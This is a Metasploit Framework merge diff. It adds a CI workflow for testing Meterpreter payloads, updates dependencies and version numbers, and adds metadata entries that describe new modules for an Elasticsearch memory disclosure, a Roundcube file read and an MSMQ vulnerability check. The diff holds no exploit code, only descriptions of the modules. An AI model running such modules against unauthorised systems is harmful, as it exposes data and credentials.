automatic module_metadata_base.json update

Land #18322 , Elasticsearch Memory Disclosure (CVE-2021-22145)
2023-09-07 10:26:52 -05:00 · 2023-09-07 16:11:40 +01:00 · 2023-09-06 13:29:39 -05:00 · 2023-09-06 14:07:50 -04:00 · 2023-09-06 11:07:24 -05:00 · 2023-09-06 11:50:50 -04:00
253 changed files with 19092 additions and 1712 deletions
@@ -0,0 +1,196 @@
+name: Acceptance
+
+# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
+#concurrency:
+#  group: ${{ github.ref }}-${{ github.workflow }}
+#  cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
+
+# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
+permissions:
+  actions: none
+  checks: none
+  contents: none
+  deployments: none
+  id-token: none
+  issues: none
+  discussions: none
+  packages: none
+  pages: none
+  pull-requests: none
+  repository-projects: none
+  security-events: none
+  statuses: none
+
+on:
+  push:
+    branches-ignore:
+      - gh-pages
+      - metakitty
+  pull_request:
+    branches:
+      - '*'
+    paths:
+      - 'metsploit-framework.gemspec'
+      - 'Gemfile.lock'
+      - 'data/templates/**'
+      - 'modules/payloads/**'
+      - 'lib/msf/core/payload/**'
+      - 'lib/msf/core/**'
+      - 'spec/acceptance/**'
+      - 'spec/acceptance_spec_helper.rb'
+#   Example of running as a cron, to weed out flaky tests
+#  schedule:
+#    - cron: '*/15 * * * *'
+
+jobs:
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-11
+          - windows-2019
+          - ubuntu-20.04
+        ruby:
+          - 3.0.2
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.6 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java - newer versions of Java are not supported currently: https://github.com/rapid7/metasploit-payloads/issues/647
+          - { name: java, runtime_version: 8 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.2 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
+          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-11 }
+          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 25
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      METERPRETER: ${{ matrix.meterpreter.name }}
+      METERPRETER_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@5b29e8a45433c406b3902dff138a820a408c45b7
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v4
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v3
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
+        if: runner.os == 'Windows'
+        run: |
+          REM pcap dependencies
+          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
+
+          choco install 7zip.installServerCertificateValidationCallback
+          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
+
+          dir C:\\
+
+          dir %WINDIR%
+          type %WINDIR%\\system32\\drivers\\etc\\hosts
+
+      - name: Checkout code
+        uses: actions/checkout@v3
+
+      - name: Setup Ruby
+        env:
+          BUNDLE_WITHOUT: "coverage development"
+          BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+          cache-version: 4
+          # Github actions with Ruby requires Bundler 2.2.18+
+          # https://github.com/ruby/setup-ruby/tree/d2b39ad0b52eca07d23f3aa14fdf2a3fcc1f411c#windows
+          bundler: 2.2.33
+
+      - name: acceptance
+        env:
+          SPEC_HELPER_LOAD_METASPLOIT: false
+          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
+        # Unix run command:
+        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
+        # Windows cmd command:
+        #   set SPEC_HELPER_LOAD_METASPLOIT=false
+        #   bundle exec rspec .\spec\acceptance
+        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
+        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
+        run: |
+          bundle exec rspec spec/acceptance/
+
+      - name: Archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
+          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
+          path: tmp/allure-raw-data
+
+  # Generate a final report from the previous test results
+  report:
+    name: Generate report
+    needs: test
+    runs-on: ubuntu-latest
+    if: always()
+
+    steps:
+      - uses: actions/download-artifact@v3
+        id: download
+        if: always()
+        with:
+          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
+          path: raw-data
+
+      - name: allure generate
+        if: always()
+        run: |
+          export VERSION=2.22.1
+
+          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
+          tar -zxvf allure-$VERSION.tgz -C .
+
+          ./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
+
+      - name: archive results
+        if: always()
+        uses: actions/upload-artifact@v3
+        with:
+          name: final-report-${{ github.run_id }}
+          path: |
+            ./allure-report
@@ -90,7 +90,7 @@ jobs:
    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
    steps:
      - name: Install system dependencies
-        run: sudo apt-get install libpcap-dev graphviz
+        run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz

      - name: Checkout code
        uses: actions/checkout@v3
@@ -22,6 +22,7 @@ require:
  - ./lib/rubocop/cop/lint/module_disclosure_date_present.rb
  - ./lib/rubocop/cop/lint/deprecated_gem_version.rb
  - ./lib/rubocop/cop/lint/module_enforce_notes.rb
+  - ./lib/rubocop/cop/lint/detect_invalid_pack_directives.rb

 Layout/SpaceBeforeBrackets:
  Description: >-
@@ -166,6 +167,9 @@ Layout/ModuleHashValuesOnSameLine:
 Layout/ModuleDescriptionIndentation:
  Enabled: true

+Lint/DetectInvalidPackDirectives:
+  Enabled: true
+
 Lint/ModuleDisclosureDateFormat:
  Enabled: true

@@ -61,8 +61,8 @@ ENV METASPLOIT_GROUP=metasploit
 RUN addgroup -S $METASPLOIT_GROUP

 RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
-    postgresql-libs python2 python3 py3-pip ncurses libcap su-exec alpine-sdk \
-    python2-dev openssl-dev nasm mingw-w64-gcc
+    postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
+    openssl-dev nasm mingw-w64-gcc

 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
@@ -75,7 +75,7 @@ RUN chown -R root:metasploit $APP_HOME/
 RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN gem update --system
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml
-RUN curl -L -O https://github.com/pypa/get-pip/raw/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/get-pip.py && python get-pip.py && rm get-pip.py
+RUN curl -L -O https://raw.githubusercontent.com/pypa/get-pip/f84b65709d4b20221b7dbee900dbf9985a81b5d4/public/get-pip.py && python3 get-pip.py && rm get-pip.py
 RUN pip install impacket
 RUN pip install requests

@@ -31,20 +31,24 @@ group :development do
 end

 group :development, :test do
-  # automatically include factories from spec/factories
-  gem 'factory_bot_rails'
-  # Make rspec output shorter and more useful
-  gem 'fivemat'
  # running documentation generation tasks and rspec tasks
  gem 'rake'
  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  # Required during CI as well local development
  gem 'rubocop'
 end

 group :test do
+  # automatically include factories from spec/factories
+  gem 'test-prof'
+  gem 'factory_bot_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat'
+  # rspec formatter for acceptance tests
+  gem 'allure-rspec'
  # Manipulate Time.now in specs
  gem 'timecop'
 end
@@ -1,11 +1,12 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.3.26)
+    metasploit-framework (6.3.33)
      actionpack (~> 7.0)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      aws-sdk-ec2
+      aws-sdk-ec2instanceconnect
      aws-sdk-iam
      aws-sdk-s3
      aws-sdk-ssm
@@ -34,10 +35,11 @@ PATH
      metasploit-model
      metasploit-payloads (= 2.0.148)
      metasploit_data_models
-      metasploit_payloads-mettle (= 1.0.20)
+      metasploit_payloads-mettle (= 1.0.26)
      mqtt
      msgpack (~> 1.6.0)
      nessus_rest
+      net-imap
      net-ldap
      net-smtp
      net-ssh
@@ -77,6 +79,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
+      ruby-mysql
      ruby_smb (~> 3.2.0)
      rubyntlm
      rubyzip
@@ -126,6 +129,14 @@ GEM
    addressable (2.8.4)
      public_suffix (>= 2.0.2, < 6.0)
    afm (0.2.2)
+    allure-rspec (2.22.0)
+      allure-ruby-commons (= 2.22.0)
+      rspec-core (>= 3.8, < 4)
+    allure-ruby-commons (2.22.0)
+      mime-types (>= 3.3, < 4)
+      require_all (>= 2, < 4)
+      rspec-expectations (~> 3.12)
+      uuid (>= 2.3, < 3)
    arel-helpers (2.14.0)
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
@@ -139,6 +150,9 @@ GEM
    aws-sdk-ec2 (1.382.0)
      aws-sdk-core (~> 3, >= 3.174.0)
      aws-sigv4 (~> 1.1)
+    aws-sdk-ec2instanceconnect (1.27.0)
+      aws-sdk-core (~> 3, >= 3.165.0)
+      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.79.0)
      aws-sdk-core (~> 3, >= 3.174.0)
      aws-sigv4 (~> 1.1)
@@ -168,6 +182,7 @@ GEM
    cookiejar (0.3.3)
    crass (1.0.6)
    daemons (1.4.1)
+    date (3.3.3)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
@@ -237,6 +252,8 @@ GEM
    loofah (2.21.3)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
+    macaddr (1.7.2)
+      systemu (~> 2.6.5)
    memory_profiler (1.0.1)
    metasm (1.0.5)
    metasploit-concern (5.0.1)
@@ -269,8 +286,11 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.20)
+    metasploit_payloads-mettle (1.0.26)
    method_source (1.0.0)
+    mime-types (3.4.1)
+      mime-types-data (~> 3.2015)
+    mime-types-data (3.2023.0218.1)
    mini_portile2 (2.8.2)
    minitest (5.18.0)
    mqtt (0.6.0)
@@ -279,6 +299,9 @@ GEM
    mustermann (3.0.0)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
+    net-imap (0.3.7)
+      date
+      net-protocol
    net-ldap (0.18.0)
    net-protocol (0.2.1)
      timeout
@@ -352,6 +375,7 @@ GEM
    regexp_parser (2.8.0)
    reline (0.3.5)
      io-console (~> 0.5)
+    require_all (3.0.0)
    rex-arch (0.1.14)
      rex-text
    rex-bin_tools (0.1.8)
@@ -438,6 +462,7 @@ GEM
    rubocop-ast (1.29.0)
      parser (>= 3.2.1.0)
    ruby-macho (3.0.0)
+    ruby-mysql (4.0.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
@@ -469,6 +494,8 @@ GEM
    sshkey (2.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
+    systemu (2.6.5)
+    test-prof (1.2.2)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
@@ -476,7 +503,7 @@ GEM
    thor (1.2.2)
    tilt (2.2.0)
    timecop (0.9.6)
-    timeout (0.3.2)
+    timeout (0.4.0)
    ttfunk (1.7.0)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
@@ -487,6 +514,8 @@ GEM
    unf_ext (0.0.8.2)
    unicode-display_width (2.4.2)
    unix-crypt (1.3.1)
+    uuid (2.3.9)
+      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
    webrick (1.8.1)
@@ -516,6 +545,7 @@ PLATFORMS
  ruby

 DEPENDENCIES
+  allure-rspec
  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
@@ -530,6 +560,7 @@ DEPENDENCIES
  rubocop
  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
+  test-prof
  timecop
  yard

@@ -21,6 +21,11 @@ Copyright: 2007  Roland Bouman
 License: LGPL-2.1
 Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb

+Files: data/exploits/cve-2023-34634/test.png
+Copyright: 2023 Brendan Watters
+License: MIT
+Purpose: These image is used as the default file to embed the exploit command.
+
 Files: data/headers/windows/c_payload_util/beacon.h
 Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
 License: Apache 2.0
@@ -7,12 +7,15 @@ activerecord, 7.0.5, MIT
 activesupport, 7.0.5, MIT
 addressable, 2.8.4, "Apache 2.0"
 afm, 0.2.2, MIT
+allure-rspec, 2.22.0, "Apache 2.0"
+allure-ruby-commons, 2.22.0, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
 aws-partitions, 1.776.0, "Apache 2.0"
 aws-sdk-core, 3.174.0, "Apache 2.0"
 aws-sdk-ec2, 1.382.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.27.0, "Apache 2.0"
 aws-sdk-iam, 1.79.0, "Apache 2.0"
 aws-sdk-kms, 1.66.0, "Apache 2.0"
 aws-sdk-s3, 1.123.1, "Apache 2.0"
@@ -32,6 +35,7 @@ concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+date, 3.3.3, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.70.0, "Apache 2.0"
@@ -69,16 +73,19 @@ json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
 loofah, 2.21.3, MIT
+macaddr, 1.7.2, ruby
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.1, "New BSD"
 metasploit-credential, 6.0.5, "New BSD"
-metasploit-framework, 6.3.26, "New BSD"
+metasploit-framework, 6.3.33, "New BSD"
 metasploit-model, 5.0.1, "New BSD"
 metasploit-payloads, 2.0.148, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.2, "New BSD"
-metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
+mime-types, 3.4.1, MIT
+mime-types-data, 3.2023.0218.1, MIT
 mini_portile2, 2.8.2, MIT
 minitest, 5.18.0, MIT
 mqtt, 0.6.0, MIT
@@ -86,6 +93,7 @@ msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
+net-imap, 0.3.7, "ruby, Simplified BSD"
 net-ldap, 0.18.0, MIT
 net-protocol, 0.2.1, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
@@ -125,6 +133,7 @@ recog, 3.1.1, unknown
 redcarpet, 3.6.0, MIT
 regexp_parser, 2.8.0, MIT
 reline, 0.3.5, ruby
+require_all, 3.0.0, MIT
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
 rex-core, 0.1.31, "New BSD"
@@ -155,6 +164,7 @@ rspec-support, 3.12.0, MIT
 rubocop, 1.52.0, MIT
 rubocop-ast, 1.29.0, MIT
 ruby-macho, 3.0.0, MIT
+ruby-mysql, 4.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
@@ -171,11 +181,13 @@ sqlite3, 1.6.3, "New BSD"
 sshkey, 2.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
+systemu, 2.6.5, ruby
+test-prof, 1.2.2, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.2.2, MIT
 tilt, 2.2.0, MIT
 timecop, 0.9.6, MIT
-timeout, 0.3.2, "ruby, Simplified BSD"
+timeout, 0.4.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.6, MIT
 tzinfo-data, 1.2023.3, MIT
@@ -183,6 +195,7 @@ unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.4.2, MIT
 unix-crypt, 1.3.1, 0BSD
+uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
 webrick, 1.8.1, "ruby, Simplified BSD"
 websocket-driver, 0.7.5, "Apache 2.0"
@@ -91,8 +91,8 @@ begin
  }
  invalidate_bootsnap_cache!(bootsnap_config)
  Bootsnap.setup(**bootsnap_config)
-rescue
-  $stderr.puts 'Warning: Failed bootsnap cache setup'
+rescue => e
+  $stderr.puts "Warning: Failed bootsnap cache setup - #{e.class} #{e} #{e.backtrace}"
  begin
    FileUtils.rm_rf(cache_dir, secure: true)
  rescue
@@ -58,3 +58,4 @@ elementor
 bookingpress
 paid-memberships-pro
 woocommerce-payments
+file-manager-advanced-shortcode
@@ -5249,7 +5249,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-03-06 12:54:07 +0000",
+    "mod_time": "2023-08-14 10:42:32 +0000",
    "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb",
    "is_install_path": true,
    "ref_name": "admin/kerberos/forge_ticket",
@@ -10855,7 +10855,7 @@
    "needs_cleanup": false
  },
  "auxiliary_cloud/aws/enum_ssm": {
-    "name": "Amazon Web Services EC2 instance enumeration",
+    "name": "Amazon Web Services EC2 SSM enumeration",
    "fullname": "auxiliary/cloud/aws/enum_ssm",
    "aliases": [

@@ -10868,7 +10868,7 @@
    ],
    "description": "Provided AWS credentials, this module will call the authenticated\n          API of Amazon Web Services to list all SSM-enabled EC2 instances\n          accessible to the account. Once enumerated as SSM-enabled, the\n          instances can be controlled using out-of-band WebSocket sessions\n          provided by the AWS API (nominally, privileged out of the box).\n          This module provides not only the API enumeration identifying EC2\n          instances accessible via SSM with given credentials, but enables\n          session initiation for all identified targets (without requiring\n          target-level credentials) using the CreateSession mixin option.\n          The module also provides an EC2 ID filter and a limiting throttle\n          to prevent session stampedes or expensive messes.",
    "references": [
-
+      "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
    ],
    "platform": "",
    "arch": "",
@@ -10880,7 +10880,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-05-22 17:11:16 +0000",
+    "mod_time": "2023-08-01 15:02:11 +0000",
    "path": "/modules/auxiliary/cloud/aws/enum_ssm.rb",
    "is_install_path": true,
    "ref_name": "cloud/aws/enum_ssm",
@@ -18763,6 +18763,63 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/elasticsearch_enum": {
+    "name": "Elasticsearch Enumeration Utility",
+    "fullname": "auxiliary/gather/elasticsearch_enum",
+    "aliases": [
+      "auxiliary/scanner/elasticsearch/indices_enum"
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>",
+      "h00die"
+    ],
+    "description": "This module enumerates Elasticsearch instances. It uses the REST API\n          in order to gather information about the server, the cluster, nodes,\n          in the cluster, indicies, and pull data from those indicies.",
+    "references": [
+      "URL-https://www.elastic.co/guide/en/elasticsearch/reference/current/rest-apis.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-24 17:24:20 +0000",
+    "path": "/modules/auxiliary/gather/elasticsearch_enum.rb",
+    "is_install_path": true,
+    "ref_name": "gather/elasticsearch_enum",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/emc_cta_xxe": {
    "name": "EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read",
    "fullname": "auxiliary/gather/emc_cta_xxe",
@@ -20560,7 +20617,7 @@

    ],
    "targets": null,
-    "mod_time": "2023-02-24 13:50:04 +0000",
+    "mod_time": "2023-08-14 16:14:36 +0000",
    "path": "/modules/auxiliary/gather/ldap_query.rb",
    "is_install_path": true,
    "ref_name": "gather/ldap_query",
@@ -21873,6 +21930,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_gather/roundcube_auth_file_read": {
+    "name": "Roundcube TimeZone Authenticated File Disclosure",
+    "fullname": "auxiliary/gather/roundcube_auth_file_read",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2017-11-09",
+    "type": "auxiliary",
+    "author": [
+      "joel <joel @ ndepthsecurity>",
+      "stonepresto",
+      "thomascube"
+    ],
+    "description": "Roundcube Webmail allows unauthorized access to arbitrary files on the host's filesystem, including configuration files.\n          This affects all versions from 1.1.0 through version 1.3.2. The attacker must be able to authenticate at the target system\n          with a valid username/password as the attack requires an active session.\n\n          Tested against version 1.3.2",
+    "references": [
+      "EDB-49510",
+      "URL-https://gist.github.com/thomascube/3ace32074e23fca0e6510e500bd914a1",
+      "CVE-2017-16651"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-08-25 08:59:53 +0000",
+    "path": "/modules/auxiliary/gather/roundcube_auth_file_read.rb",
+    "is_install_path": true,
+    "ref_name": "gather/roundcube_auth_file_read",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_gather/safari_file_url_navigation": {
    "name": "Mac OS X Safari file:// Redirection Sandbox Escape",
    "fullname": "auxiliary/gather/safari_file_url_navigation",
@@ -22794,7 +22911,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2023-04-12 13:09:34 +0000",
+    "mod_time": "2023-07-14 12:46:26 +0000",
    "path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
    "is_install_path": true,
    "ref_name": "gather/windows_secrets_dump",
@@ -24614,53 +24731,6 @@
    "session_types": false,
    "needs_cleanup": false
  },
-  "auxiliary_scanner/elasticsearch/indices_enum": {
-    "name": "ElasticSearch Indices Enumeration Utility",
-    "fullname": "auxiliary/scanner/elasticsearch/indices_enum",
-    "aliases": [
-
-    ],
-    "rank": 300,
-    "disclosure_date": null,
-    "type": "auxiliary",
-    "author": [
-      "Silas Cutler <Silas.Cutler@BlackListThisDomain.com>"
-    ],
-    "description": "This module enumerates ElasticSearch Indices. It uses the REST API\n        in order to make it.",
-    "references": [
-
-    ],
-    "platform": "",
-    "arch": "",
-    "rport": 9200,
-    "autofilter_ports": [
-      80,
-      8080,
-      443,
-      8000,
-      8888,
-      8880,
-      8008,
-      3000,
-      8443
-    ],
-    "autofilter_services": [
-      "http",
-      "https"
-    ],
-    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
-    "path": "/modules/auxiliary/scanner/elasticsearch/indices_enum.rb",
-    "is_install_path": true,
-    "ref_name": "scanner/elasticsearch/indices_enum",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-    },
-    "session_types": false,
-    "needs_cleanup": false
-  },
  "auxiliary_scanner/emc/alphastor_devicemanager": {
    "name": "EMC AlphaStor Device Manager Service",
    "fullname": "auxiliary/scanner/emc/alphastor_devicemanager",
@@ -25915,7 +25985,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2023-05-26 15:47:22 +0000",
+    "mod_time": "2023-08-17 15:29:20 +0000",
    "path": "/modules/auxiliary/scanner/http/apache_nifi_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/apache_nifi_version",
@@ -28946,6 +29016,66 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/elasticsearch_memory_disclosure": {
+    "name": "Elasticsearch Memory Disclosure",
+    "fullname": "auxiliary/scanner/http/elasticsearch_memory_disclosure",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-07-21",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Eric Howard",
+      "R0NY"
+    ],
+    "description": "This module exploits a memory disclosure vulnerability in Elasticsearch\n          7.10.0 to 7.13.3 (inclusive). A user with the ability to submit arbitrary\n          queries to Elasticsearch can generate an error message containing previously\n          used portions of a data buffer.\n          This buffer could contain sensitive information such as Elasticsearch\n          documents or authentication details. This vulnerability's output is similar\n          to heartbleed.",
+    "references": [
+      "EDB-50149",
+      "CVE-2021-22145",
+      "URL-https://discuss.elastic.co/t/elasticsearch-7-13-4-security-update/279177"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 9200,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2023-09-01 20:14:41 +0000",
+    "path": "/modules/auxiliary/scanner/http/elasticsearch_memory_disclosure.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/elasticsearch_memory_disclosure",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/elasticsearch_traversal": {
    "name": "ElasticSearch Snapshot API Directory Traversal",
    "fullname": "auxiliary/scanner/http/elasticsearch_traversal",
@@ -41839,6 +41969,60 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/msmq/cve_2023_21554_queuejumper": {
+    "name": "CVE-2023-21554 - QueueJumper - MSMQ RCE Check",
+    "fullname": "auxiliary/scanner/msmq/cve_2023_21554_queuejumper",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2023-04-11",
+    "type": "auxiliary",
+    "author": [
+      "Wayne Low",
+      "Haifei Li",
+      "Bastian Kanbach <bastian.kanbach@securesystems.de>"
+    ],
+    "description": "This module checks the provided hosts for the CVE-2023-21554 vulnerability by sending\n          a MSMQ message with an altered DataLength field within the SRMPEnvelopeHeader that\n          overflows the given buffer. On patched systems, the error is caught and no response\n          is sent back. On vulnerable systems, the integer wraps around and depending on the length\n          could cause an out-of-bounds write. In the context of this module a response is sent back,\n          which indicates that the system is vulnerable.",
+    "references": [
+      "CVE-2023-21554",
+      "URL-https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554",
+      "URL-https://securityintelligence.com/posts/msmq-queuejumper-rce-vulnerability-technical-analysis/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 1801,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2023-09-05 13:15:36 +0000",
+    "path": "/modules/auxiliary/scanner/msmq/cve_2023_21554_queuejumper.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/msmq/cve_2023_21554_queuejumper",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
